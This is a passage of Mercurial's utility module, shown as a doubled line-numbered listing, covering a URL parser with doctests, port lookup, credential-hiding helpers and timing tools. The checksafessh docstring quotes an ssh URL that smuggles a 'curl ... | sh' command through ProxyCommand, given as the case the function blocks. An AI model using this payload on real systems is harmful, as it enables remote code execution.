2864 splitted = line.splitlines(True)
2864 splitted = line.splitlines(True)
2865 line = b''
2865 line = b''
2866 for l in splitted:
2866 for l in splitted:
2867 if l[-1] == b'\n':
2867 if l[-1] == b'\n':
2868 yield l
2868 yield l
2869 else:
2869 else:
2870 line = l
2870 line = l
2871 if not buf:
2871 if not buf:
2872 break
2872 break
2873 if line:
2873 if line:
2874 yield line
2874 yield line
2875
2875
2876 def iterfile(fp):
2876 def iterfile(fp):
2877 fastpath = True
2877 fastpath = True
2878 if type(fp) is file:
2878 if type(fp) is file:
2879 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2879 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2880 if fastpath:
2880 if fastpath:
2881 return fp
2881 return fp
2882 else:
2882 else:
2883 return _safeiterfile(fp)
2883 return _safeiterfile(fp)
2884
2884
2885
2885
2886 else:
2886 else:
2887 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2887 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2888 def iterfile(fp):
2888 def iterfile(fp):
2889 return fp
2889 return fp
2890
2890
2891
2891
2892 def iterlines(iterator):
2892 def iterlines(iterator):
2893 for chunk in iterator:
2893 for chunk in iterator:
2894 for line in chunk.splitlines():
2894 for line in chunk.splitlines():
2895 yield line
2895 yield line
2896
2896
2897
2897
2898 def expandpath(path):
2898 def expandpath(path):
2899 return os.path.expanduser(os.path.expandvars(path))
2899 return os.path.expanduser(os.path.expandvars(path))
2900
2900
2901
2901
2902 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2902 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2903 """Return the result of interpolating items in the mapping into string s.
2903 """Return the result of interpolating items in the mapping into string s.
2904
2904
2905 prefix is a single character string, or a two character string with
2905 prefix is a single character string, or a two character string with
2906 a backslash as the first character if the prefix needs to be escaped in
2906 a backslash as the first character if the prefix needs to be escaped in
2907 a regular expression.
2907 a regular expression.
2908
2908
2909 fn is an optional function that will be applied to the replacement text
2909 fn is an optional function that will be applied to the replacement text
2910 just before replacement.
2910 just before replacement.
2911
2911
2912 escape_prefix is an optional flag that allows using doubled prefix for
2912 escape_prefix is an optional flag that allows using doubled prefix for
2913 its escaping.
2913 its escaping.
2914 """
2914 """
2915 fn = fn or (lambda s: s)
2915 fn = fn or (lambda s: s)
2916 patterns = b'|'.join(mapping.keys())
2916 patterns = b'|'.join(mapping.keys())
2917 if escape_prefix:
2917 if escape_prefix:
2918 patterns += b'|' + prefix
2918 patterns += b'|' + prefix
2919 if len(prefix) > 1:
2919 if len(prefix) > 1:
2920 prefix_char = prefix[1:]
2920 prefix_char = prefix[1:]
2921 else:
2921 else:
2922 prefix_char = prefix
2922 prefix_char = prefix
2923 mapping[prefix_char] = prefix_char
2923 mapping[prefix_char] = prefix_char
2924 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2924 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2925 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2925 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2926
2926
2927
2927
2928 def getport(port):
2928 def getport(port):
2929 """Return the port for a given network service.
2929 """Return the port for a given network service.
2930
2930
2931 If port is an integer, it's returned as is. If it's a string, it's
2931 If port is an integer, it's returned as is. If it's a string, it's
2932 looked up using socket.getservbyname(). If there's no matching
2932 looked up using socket.getservbyname(). If there's no matching
2933 service, error.Abort is raised.
2933 service, error.Abort is raised.
2934 """
2934 """
2935 try:
2935 try:
2936 return int(port)
2936 return int(port)
2937 except ValueError:
2937 except ValueError:
2938 pass
2938 pass
2939
2939
2940 try:
2940 try:
2941 return socket.getservbyname(pycompat.sysstr(port))
2941 return socket.getservbyname(pycompat.sysstr(port))
2942 except socket.error:
2942 except socket.error:
2943 raise error.Abort(
2943 raise error.Abort(
2944 _(b"no port number associated with service '%s'") % port
2944 _(b"no port number associated with service '%s'") % port
2945 )
2945 )
2946
2946
2947
2947
2948 class url(object):
2948 class url(object):
2949 r"""Reliable URL parser.
2949 r"""Reliable URL parser.
2950
2950
2951 This parses URLs and provides attributes for the following
2951 This parses URLs and provides attributes for the following
2952 components:
2952 components:
2953
2953
2954 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2954 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2955
2955
2956 Missing components are set to None. The only exception is
2956 Missing components are set to None. The only exception is
2957 fragment, which is set to '' if present but empty.
2957 fragment, which is set to '' if present but empty.
2958
2958
2959 If parsefragment is False, fragment is included in query. If
2959 If parsefragment is False, fragment is included in query. If
2960 parsequery is False, query is included in path. If both are
2960 parsequery is False, query is included in path. If both are
2961 False, both fragment and query are included in path.
2961 False, both fragment and query are included in path.
2962
2962
2963 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2963 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2964
2964
2965 Note that for backward compatibility reasons, bundle URLs do not
2965 Note that for backward compatibility reasons, bundle URLs do not
2966 take host names. That means 'bundle://../' has a path of '../'.
2966 take host names. That means 'bundle://../' has a path of '../'.
2967
2967
2968 Examples:
2968 Examples:
2969
2969
2970 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2970 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2971 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2971 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2972 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2972 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2973 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2973 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2974 >>> url(b'file:///home/joe/repo')
2974 >>> url(b'file:///home/joe/repo')
2975 <url scheme: 'file', path: '/home/joe/repo'>
2975 <url scheme: 'file', path: '/home/joe/repo'>
2976 >>> url(b'file:///c:/temp/foo/')
2976 >>> url(b'file:///c:/temp/foo/')
2977 <url scheme: 'file', path: 'c:/temp/foo/'>
2977 <url scheme: 'file', path: 'c:/temp/foo/'>
2978 >>> url(b'bundle:foo')
2978 >>> url(b'bundle:foo')
2979 <url scheme: 'bundle', path: 'foo'>
2979 <url scheme: 'bundle', path: 'foo'>
2980 >>> url(b'bundle://../foo')
2980 >>> url(b'bundle://../foo')
2981 <url scheme: 'bundle', path: '../foo'>
2981 <url scheme: 'bundle', path: '../foo'>
2982 >>> url(br'c:\foo\bar')
2982 >>> url(br'c:\foo\bar')
2983 <url path: 'c:\\foo\\bar'>
2983 <url path: 'c:\\foo\\bar'>
2984 >>> url(br'\\blah\blah\blah')
2984 >>> url(br'\\blah\blah\blah')
2985 <url path: '\\\\blah\\blah\\blah'>
2985 <url path: '\\\\blah\\blah\\blah'>
2986 >>> url(br'\\blah\blah\blah#baz')
2986 >>> url(br'\\blah\blah\blah#baz')
2987 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2987 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2988 >>> url(br'file:///C:\users\me')
2988 >>> url(br'file:///C:\users\me')
2989 <url scheme: 'file', path: 'C:\\users\\me'>
2989 <url scheme: 'file', path: 'C:\\users\\me'>
2990
2990
2991 Authentication credentials:
2991 Authentication credentials:
2992
2992
2993 >>> url(b'ssh://joe:xyz@x/repo')
2993 >>> url(b'ssh://joe:xyz@x/repo')
2994 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2994 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2995 >>> url(b'ssh://joe@x/repo')
2995 >>> url(b'ssh://joe@x/repo')
2996 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2996 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2997
2997
2998 Query strings and fragments:
2998 Query strings and fragments:
2999
2999
3000 >>> url(b'http://host/a?b#c')
3000 >>> url(b'http://host/a?b#c')
3001 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3001 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3002 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3002 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3003 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3003 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3004
3004
3005 Empty path:
3005 Empty path:
3006
3006
3007 >>> url(b'')
3007 >>> url(b'')
3008 <url path: ''>
3008 <url path: ''>
3009 >>> url(b'#a')
3009 >>> url(b'#a')
3010 <url path: '', fragment: 'a'>
3010 <url path: '', fragment: 'a'>
3011 >>> url(b'http://host/')
3011 >>> url(b'http://host/')
3012 <url scheme: 'http', host: 'host', path: ''>
3012 <url scheme: 'http', host: 'host', path: ''>
3013 >>> url(b'http://host/#a')
3013 >>> url(b'http://host/#a')
3014 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3014 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3015
3015
3016 Only scheme:
3016 Only scheme:
3017
3017
3018 >>> url(b'http:')
3018 >>> url(b'http:')
3019 <url scheme: 'http'>
3019 <url scheme: 'http'>
3020 """
3020 """
3021
3021
3022 _safechars = b"!~*'()+"
3022 _safechars = b"!~*'()+"
3023 _safepchars = b"/!~*'()+:\\"
3023 _safepchars = b"/!~*'()+:\\"
3024 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3024 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3025
3025
3026 def __init__(self, path, parsequery=True, parsefragment=True):
3026 def __init__(self, path, parsequery=True, parsefragment=True):
3027 # We slowly chomp away at path until we have only the path left
3027 # We slowly chomp away at path until we have only the path left
3028 self.scheme = self.user = self.passwd = self.host = None
3028 self.scheme = self.user = self.passwd = self.host = None
3029 self.port = self.path = self.query = self.fragment = None
3029 self.port = self.path = self.query = self.fragment = None
3030 self._localpath = True
3030 self._localpath = True
3031 self._hostport = b''
3031 self._hostport = b''
3032 self._origpath = path
3032 self._origpath = path
3033
3033
3034 if parsefragment and b'#' in path:
3034 if parsefragment and b'#' in path:
3035 path, self.fragment = path.split(b'#', 1)
3035 path, self.fragment = path.split(b'#', 1)
3036
3036
3037 # special case for Windows drive letters and UNC paths
3037 # special case for Windows drive letters and UNC paths
3038 if hasdriveletter(path) or path.startswith(b'\\\\'):
3038 if hasdriveletter(path) or path.startswith(b'\\\\'):
3039 self.path = path
3039 self.path = path
3040 return
3040 return
3041
3041
3042 # For compatibility reasons, we can't handle bundle paths as
3042 # For compatibility reasons, we can't handle bundle paths as
3043 # normal URLS
3043 # normal URLS
3044 if path.startswith(b'bundle:'):
3044 if path.startswith(b'bundle:'):
3045 self.scheme = b'bundle'
3045 self.scheme = b'bundle'
3046 path = path[7:]
3046 path = path[7:]
3047 if path.startswith(b'//'):
3047 if path.startswith(b'//'):
3048 path = path[2:]
3048 path = path[2:]
3049 self.path = path
3049 self.path = path
3050 return
3050 return
3051
3051
3052 if self._matchscheme(path):
3052 if self._matchscheme(path):
3053 parts = path.split(b':', 1)
3053 parts = path.split(b':', 1)
3054 if parts[0]:
3054 if parts[0]:
3055 self.scheme, path = parts
3055 self.scheme, path = parts
3056 self._localpath = False
3056 self._localpath = False
3057
3057
3058 if not path:
3058 if not path:
3059 path = None
3059 path = None
3060 if self._localpath:
3060 if self._localpath:
3061 self.path = b''
3061 self.path = b''
3062 return
3062 return
3063 else:
3063 else:
3064 if self._localpath:
3064 if self._localpath:
3065 self.path = path
3065 self.path = path
3066 return
3066 return
3067
3067
3068 if parsequery and b'?' in path:
3068 if parsequery and b'?' in path:
3069 path, self.query = path.split(b'?', 1)
3069 path, self.query = path.split(b'?', 1)
3070 if not path:
3070 if not path:
3071 path = None
3071 path = None
3072 if not self.query:
3072 if not self.query:
3073 self.query = None
3073 self.query = None
3074
3074
3075 # // is required to specify a host/authority
3075 # // is required to specify a host/authority
3076 if path and path.startswith(b'//'):
3076 if path and path.startswith(b'//'):
3077 parts = path[2:].split(b'/', 1)
3077 parts = path[2:].split(b'/', 1)
3078 if len(parts) > 1:
3078 if len(parts) > 1:
3079 self.host, path = parts
3079 self.host, path = parts
3080 else:
3080 else:
3081 self.host = parts[0]
3081 self.host = parts[0]
3082 path = None
3082 path = None
3083 if not self.host:
3083 if not self.host:
3084 self.host = None
3084 self.host = None
3085 # path of file:///d is /d
3085 # path of file:///d is /d
3086 # path of file:///d:/ is d:/, not /d:/
3086 # path of file:///d:/ is d:/, not /d:/
3087 if path and not hasdriveletter(path):
3087 if path and not hasdriveletter(path):
3088 path = b'/' + path
3088 path = b'/' + path
3089
3089
3090 if self.host and b'@' in self.host:
3090 if self.host and b'@' in self.host:
3091 self.user, self.host = self.host.rsplit(b'@', 1)
3091 self.user, self.host = self.host.rsplit(b'@', 1)
3092 if b':' in self.user:
3092 if b':' in self.user:
3093 self.user, self.passwd = self.user.split(b':', 1)
3093 self.user, self.passwd = self.user.split(b':', 1)
3094 if not self.host:
3094 if not self.host:
3095 self.host = None
3095 self.host = None
3096
3096
3097 # Don't split on colons in IPv6 addresses without ports
3097 # Don't split on colons in IPv6 addresses without ports
3098 if (
3098 if (
3099 self.host
3099 self.host
3100 and b':' in self.host
3100 and b':' in self.host
3101 and not (
3101 and not (
3102 self.host.startswith(b'[') and self.host.endswith(b']')
3102 self.host.startswith(b'[') and self.host.endswith(b']')
3103 )
3103 )
3104 ):
3104 ):
3105 self._hostport = self.host
3105 self._hostport = self.host
3106 self.host, self.port = self.host.rsplit(b':', 1)
3106 self.host, self.port = self.host.rsplit(b':', 1)
3107 if not self.host:
3107 if not self.host:
3108 self.host = None
3108 self.host = None
3109
3109
3110 if (
3110 if (
3111 self.host
3111 self.host
3112 and self.scheme == b'file'
3112 and self.scheme == b'file'
3113 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3113 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3114 ):
3114 ):
3115 raise error.Abort(
3115 raise error.Abort(
3116 _(b'file:// URLs can only refer to localhost')
3116 _(b'file:// URLs can only refer to localhost')
3117 )
3117 )
3118
3118
3119 self.path = path
3119 self.path = path
3120
3120
3121 # leave the query string escaped
3121 # leave the query string escaped
3122 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3122 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3123 v = getattr(self, a)
3123 v = getattr(self, a)
3124 if v is not None:
3124 if v is not None:
3125 setattr(self, a, urlreq.unquote(v))
3125 setattr(self, a, urlreq.unquote(v))
3126
3126
3127 @encoding.strmethod
3127 @encoding.strmethod
3128 def __repr__(self):
3128 def __repr__(self):
3129 attrs = []
3129 attrs = []
3130 for a in (
3130 for a in (
3131 b'scheme',
3131 b'scheme',
3132 b'user',
3132 b'user',
3133 b'passwd',
3133 b'passwd',
3134 b'host',
3134 b'host',
3135 b'port',
3135 b'port',
3136 b'path',
3136 b'path',
3137 b'query',
3137 b'query',
3138 b'fragment',
3138 b'fragment',
3139 ):
3139 ):
3140 v = getattr(self, a)
3140 v = getattr(self, a)
3141 if v is not None:
3141 if v is not None:
3142 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3142 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3143 return b'<url %s>' % b', '.join(attrs)
3143 return b'<url %s>' % b', '.join(attrs)
3144
3144
3145 def __bytes__(self):
3145 def __bytes__(self):
3146 r"""Join the URL's components back into a URL string.
3146 r"""Join the URL's components back into a URL string.
3147
3147
3148 Examples:
3148 Examples:
3149
3149
3150 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3150 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3151 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3151 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3152 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3152 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3153 'http://user:pw@host:80/?foo=bar&baz=42'
3153 'http://user:pw@host:80/?foo=bar&baz=42'
3154 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3154 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3155 'http://user:pw@host:80/?foo=bar%3dbaz'
3155 'http://user:pw@host:80/?foo=bar%3dbaz'
3156 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3156 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3157 'ssh://user:pw@[::1]:2200//home/joe#'
3157 'ssh://user:pw@[::1]:2200//home/joe#'
3158 >>> bytes(url(b'http://localhost:80//'))
3158 >>> bytes(url(b'http://localhost:80//'))
3159 'http://localhost:80//'
3159 'http://localhost:80//'
3160 >>> bytes(url(b'http://localhost:80/'))
3160 >>> bytes(url(b'http://localhost:80/'))
3161 'http://localhost:80/'
3161 'http://localhost:80/'
3162 >>> bytes(url(b'http://localhost:80'))
3162 >>> bytes(url(b'http://localhost:80'))
3163 'http://localhost:80/'
3163 'http://localhost:80/'
3164 >>> bytes(url(b'bundle:foo'))
3164 >>> bytes(url(b'bundle:foo'))
3165 'bundle:foo'
3165 'bundle:foo'
3166 >>> bytes(url(b'bundle://../foo'))
3166 >>> bytes(url(b'bundle://../foo'))
3167 'bundle:../foo'
3167 'bundle:../foo'
3168 >>> bytes(url(b'path'))
3168 >>> bytes(url(b'path'))
3169 'path'
3169 'path'
3170 >>> bytes(url(b'file:///tmp/foo/bar'))
3170 >>> bytes(url(b'file:///tmp/foo/bar'))
3171 'file:///tmp/foo/bar'
3171 'file:///tmp/foo/bar'
3172 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3172 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3173 'file:///c:/tmp/foo/bar'
3173 'file:///c:/tmp/foo/bar'
3174 >>> print(url(br'bundle:foo\bar'))
3174 >>> print(url(br'bundle:foo\bar'))
3175 bundle:foo\bar
3175 bundle:foo\bar
3176 >>> print(url(br'file:///D:\data\hg'))
3176 >>> print(url(br'file:///D:\data\hg'))
3177 file:///D:\data\hg
3177 file:///D:\data\hg
3178 """
3178 """
3179 if self._localpath:
3179 if self._localpath:
3180 s = self.path
3180 s = self.path
3181 if self.scheme == b'bundle':
3181 if self.scheme == b'bundle':
3182 s = b'bundle:' + s
3182 s = b'bundle:' + s
3183 if self.fragment:
3183 if self.fragment:
3184 s += b'#' + self.fragment
3184 s += b'#' + self.fragment
3185 return s
3185 return s
3186
3186
3187 s = self.scheme + b':'
3187 s = self.scheme + b':'
3188 if self.user or self.passwd or self.host:
3188 if self.user or self.passwd or self.host:
3189 s += b'//'
3189 s += b'//'
3190 elif self.scheme and (
3190 elif self.scheme and (
3191 not self.path
3191 not self.path
3192 or self.path.startswith(b'/')
3192 or self.path.startswith(b'/')
3193 or hasdriveletter(self.path)
3193 or hasdriveletter(self.path)
3194 ):
3194 ):
3195 s += b'//'
3195 s += b'//'
3196 if hasdriveletter(self.path):
3196 if hasdriveletter(self.path):
3197 s += b'/'
3197 s += b'/'
3198 if self.user:
3198 if self.user:
3199 s += urlreq.quote(self.user, safe=self._safechars)
3199 s += urlreq.quote(self.user, safe=self._safechars)
3200 if self.passwd:
3200 if self.passwd:
3201 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3201 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3202 if self.user or self.passwd:
3202 if self.user or self.passwd:
3203 s += b'@'
3203 s += b'@'
3204 if self.host:
3204 if self.host:
3205 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3205 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3206 s += urlreq.quote(self.host)
3206 s += urlreq.quote(self.host)
3207 else:
3207 else:
3208 s += self.host
3208 s += self.host
3209 if self.port:
3209 if self.port:
3210 s += b':' + urlreq.quote(self.port)
3210 s += b':' + urlreq.quote(self.port)
3211 if self.host:
3211 if self.host:
3212 s += b'/'
3212 s += b'/'
3213 if self.path:
3213 if self.path:
3214 # TODO: similar to the query string, we should not unescape the
3214 # TODO: similar to the query string, we should not unescape the
3215 # path when we store it, the path might contain '%2f' = '/',
3215 # path when we store it, the path might contain '%2f' = '/',
3216 # which we should *not* escape.
3216 # which we should *not* escape.
3217 s += urlreq.quote(self.path, safe=self._safepchars)
3217 s += urlreq.quote(self.path, safe=self._safepchars)
3218 if self.query:
3218 if self.query:
3219 # we store the query in escaped form.
3219 # we store the query in escaped form.
3220 s += b'?' + self.query
3220 s += b'?' + self.query
3221 if self.fragment is not None:
3221 if self.fragment is not None:
3222 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3222 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3223 return s
3223 return s
3224
3224
3225 __str__ = encoding.strmethod(__bytes__)
3225 __str__ = encoding.strmethod(__bytes__)
3226
3226
3227 def authinfo(self):
3227 def authinfo(self):
3228 user, passwd = self.user, self.passwd
3228 user, passwd = self.user, self.passwd
3229 try:
3229 try:
3230 self.user, self.passwd = None, None
3230 self.user, self.passwd = None, None
3231 s = bytes(self)
3231 s = bytes(self)
3232 finally:
3232 finally:
3233 self.user, self.passwd = user, passwd
3233 self.user, self.passwd = user, passwd
3234 if not self.user:
3234 if not self.user:
3235 return (s, None)
3235 return (s, None)
3236 # authinfo[1] is passed to urllib2 password manager, and its
3236 # authinfo[1] is passed to urllib2 password manager, and its
3237 # URIs must not contain credentials. The host is passed in the
3237 # URIs must not contain credentials. The host is passed in the
3238 # URIs list because Python < 2.4.3 uses only that to search for
3238 # URIs list because Python < 2.4.3 uses only that to search for
3239 # a password.
3239 # a password.
3240 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3240 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3241
3241
3242 def isabs(self):
3242 def isabs(self):
3243 if self.scheme and self.scheme != b'file':
3243 if self.scheme and self.scheme != b'file':
3244 return True # remote URL
3244 return True # remote URL
3245 if hasdriveletter(self.path):
3245 if hasdriveletter(self.path):
3246 return True # absolute for our purposes - can't be joined()
3246 return True # absolute for our purposes - can't be joined()
3247 if self.path.startswith(br'\\'):
3247 if self.path.startswith(br'\\'):
3248 return True # Windows UNC path
3248 return True # Windows UNC path
3249 if self.path.startswith(b'/'):
3249 if self.path.startswith(b'/'):
3250 return True # POSIX-style
3250 return True # POSIX-style
3251 return False
3251 return False
3252
3252
3253 def localpath(self):
3253 def localpath(self):
3254 if self.scheme == b'file' or self.scheme == b'bundle':
3254 if self.scheme == b'file' or self.scheme == b'bundle':
3255 path = self.path or b'/'
3255 path = self.path or b'/'
3256 # For Windows, we need to promote hosts containing drive
3256 # For Windows, we need to promote hosts containing drive
3257 # letters to paths with drive letters.
3257 # letters to paths with drive letters.
3258 if hasdriveletter(self._hostport):
3258 if hasdriveletter(self._hostport):
3259 path = self._hostport + b'/' + self.path
3259 path = self._hostport + b'/' + self.path
3260 elif (
3260 elif (
3261 self.host is not None and self.path and not hasdriveletter(path)
3261 self.host is not None and self.path and not hasdriveletter(path)
3262 ):
3262 ):
3263 path = b'/' + path
3263 path = b'/' + path
3264 return path
3264 return path
3265 return self._origpath
3265 return self._origpath
3266
3266
3267 def islocal(self):
3267 def islocal(self):
3268 '''whether localpath will return something that posixfile can open'''
3268 '''whether localpath will return something that posixfile can open'''
3269 return (
3269 return (
3270 not self.scheme
3270 not self.scheme
3271 or self.scheme == b'file'
3271 or self.scheme == b'file'
3272 or self.scheme == b'bundle'
3272 or self.scheme == b'bundle'
3273 )
3273 )
3274
3274
3275
3275
3276 def hasscheme(path):
3276 def hasscheme(path):
3277 return bool(url(path).scheme)
3277 return bool(url(path).scheme)
3278
3278
3279
3279
3280 def hasdriveletter(path):
3280 def hasdriveletter(path):
3281 return path and path[1:2] == b':' and path[0:1].isalpha()
3281 return path and path[1:2] == b':' and path[0:1].isalpha()
3282
3282
3283
3283
3284 def urllocalpath(path):
3284 def urllocalpath(path):
3285 return url(path, parsequery=False, parsefragment=False).localpath()
3285 return url(path, parsequery=False, parsefragment=False).localpath()
3286
3286
3287
3287
3288 def checksafessh(path):
3288 def checksafessh(path):
3289 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3289 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3290
3290
3291 This is a sanity check for ssh urls. ssh will parse the first item as
3291 This is a sanity check for ssh urls. ssh will parse the first item as
3292 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3292 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3293 Let's prevent these potentially exploited urls entirely and warn the
3293 Let's prevent these potentially exploited urls entirely and warn the
3294 user.
3294 user.
3295
3295
3296 Raises an error.Abort when the url is unsafe.
3296 Raises an error.Abort when the url is unsafe.
3297 """
3297 """
3298 path = urlreq.unquote(path)
3298 path = urlreq.unquote(path)
3299 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3299 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3300 raise error.Abort(
3300 raise error.Abort(
3301 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3301 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3302 )
3302 )
3303
3303
3304
3304
3305 def hidepassword(u):
3305 def hidepassword(u):
3306 '''hide user credential in a url string'''
3306 '''hide user credential in a url string'''
3307 u = url(u)
3307 u = url(u)
3308 if u.passwd:
3308 if u.passwd:
3309 u.passwd = b'***'
3309 u.passwd = b'***'
3310 return bytes(u)
3310 return bytes(u)
3311
3311
3312
3312
3313 def removeauth(u):
3313 def removeauth(u):
3314 '''remove all authentication information from a url string'''
3314 '''remove all authentication information from a url string'''
3315 u = url(u)
3315 u = url(u)
3316 u.user = u.passwd = None
3316 u.user = u.passwd = None
3317 return bytes(u)
3317 return bytes(u)
3318
3318
3319
3319
3320 timecount = unitcountfn(
3320 timecount = unitcountfn(
3321 (1, 1e3, _(b'%.0f s')),
3321 (1, 1e3, _(b'%.0f s')),
3322 (100, 1, _(b'%.1f s')),
3322 (100, 1, _(b'%.1f s')),
3323 (10, 1, _(b'%.2f s')),
3323 (10, 1, _(b'%.2f s')),
3324 (1, 1, _(b'%.3f s')),
3324 (1, 1, _(b'%.3f s')),
3325 (100, 0.001, _(b'%.1f ms')),
3325 (100, 0.001, _(b'%.1f ms')),
3326 (10, 0.001, _(b'%.2f ms')),
3326 (10, 0.001, _(b'%.2f ms')),
3327 (1, 0.001, _(b'%.3f ms')),
3327 (1, 0.001, _(b'%.3f ms')),
3328 (100, 0.000001, _(b'%.1f us')),
3328 (100, 0.000001, _(b'%.1f us')),
3329 (10, 0.000001, _(b'%.2f us')),
3329 (10, 0.000001, _(b'%.2f us')),
3330 (1, 0.000001, _(b'%.3f us')),
3330 (1, 0.000001, _(b'%.3f us')),
3331 (100, 0.000000001, _(b'%.1f ns')),
3331 (100, 0.000000001, _(b'%.1f ns')),
3332 (10, 0.000000001, _(b'%.2f ns')),
3332 (10, 0.000000001, _(b'%.2f ns')),
3333 (1, 0.000000001, _(b'%.3f ns')),
3333 (1, 0.000000001, _(b'%.3f ns')),
3334 )
3334 )
3335
3335
3336
3336
3337 @attr.s
3337 @attr.s
3338 class timedcmstats(object):
3338 class timedcmstats(object):
3339 """Stats information produced by the timedcm context manager on entering."""
3339 """Stats information produced by the timedcm context manager on entering."""
3340
3340
3341 # the starting value of the timer as a float (meaning and resulution is
3341 # the starting value of the timer as a float (meaning and resulution is
3342 # platform dependent, see util.timer)
3342 # platform dependent, see util.timer)
3343 start = attr.ib(default=attr.Factory(lambda: timer()))
3343 start = attr.ib(default=attr.Factory(lambda: timer()))
3344 # the number of seconds as a floating point value; starts at 0, updated when
3344 # the number of seconds as a floating point value; starts at 0, updated when
3345 # the context is exited.
3345 # the context is exited.
3346 elapsed = attr.ib(default=0)
3346 elapsed = attr.ib(default=0)
3347 # the number of nested timedcm context managers.
3347 # the number of nested timedcm context managers.
3348 level = attr.ib(default=1)
3348 level = attr.ib(default=1)
3349
3349
3350 def __bytes__(self):
3350 def __bytes__(self):
3351 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3351 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3352
3352
3353 __str__ = encoding.strmethod(__bytes__)
3353 __str__ = encoding.strmethod(__bytes__)
3354
3354
3355
3355
3356 @contextlib.contextmanager
3356 @contextlib.contextmanager
3357 def timedcm(whencefmt, *whenceargs):
3357 def timedcm(whencefmt, *whenceargs):
3358 """A context manager that produces timing information for a given context.
3358 """A context manager that produces timing information for a given context.
3359
3359
3360 On entering a timedcmstats instance is produced.
3360 On entering a timedcmstats instance is produced.
3361
3361
3362 This context manager is reentrant.
3362 This context manager is reentrant.
3363
3363
3364 """
3364 """
3365 # track nested context managers
3365 # track nested context managers
3366 timedcm._nested += 1
3366 timedcm._nested += 1
3367 timing_stats = timedcmstats(level=timedcm._nested)
3367 timing_stats = timedcmstats(level=timedcm._nested)
3368 try:
3368 try:
3369 with tracing.log(whencefmt, *whenceargs):
3369 with tracing.log(whencefmt, *whenceargs):
3370 yield timing_stats
3370 yield timing_stats
3371 finally:
3371 finally:
3372 timing_stats.elapsed = timer() - timing_stats.start
3372 timing_stats.elapsed = timer() - timing_stats.start
3373 timedcm._nested -= 1
3373 timedcm._nested -= 1
3374
3374
3375
3375
3376 timedcm._nested = 0
3376 timedcm._nested = 0
3377
3377
3378
3378
